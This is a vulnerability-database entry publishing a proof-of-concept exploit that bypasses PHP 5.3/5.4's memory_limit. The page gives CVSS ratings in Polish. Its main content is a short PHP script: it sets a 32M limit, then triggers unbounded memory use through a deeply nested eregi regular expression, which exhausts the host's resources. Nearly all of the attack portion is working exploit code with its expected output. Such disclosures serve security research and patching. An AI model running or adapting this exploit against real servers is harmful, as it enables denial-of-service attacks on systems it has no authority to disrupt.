PHP 5.4 5.3 memory_limit bypass poc

2012.03.30
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-399


Ogólna skala CVSS: 7.8/10
Znaczenie: 6.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Pełny

<? /* PHP 5.4 5.3 memory_limit bypass exploit poc by Maksymilian Arciemowicz http://cxsecurity.com/ cxib [ a.T] cxsecurity [ d0t] com To show memory_limit in PHP # php /www/memlimpoc.php 1 35000000 PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in /var/www/memlimpoc.php on line 12 Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in /var/www/memlimpoc.php on line 12 and try this # php /www/memlimpoc.php 2 memory_limit bypassed */ ini_set("memory_limit","32M"); if($argv[1]==1) $sss=str_repeat("A",$argv[2]); elseif($argv[1]==2) eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a"); ?>

Referencje:

http://cxsecurity.com/research/102


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top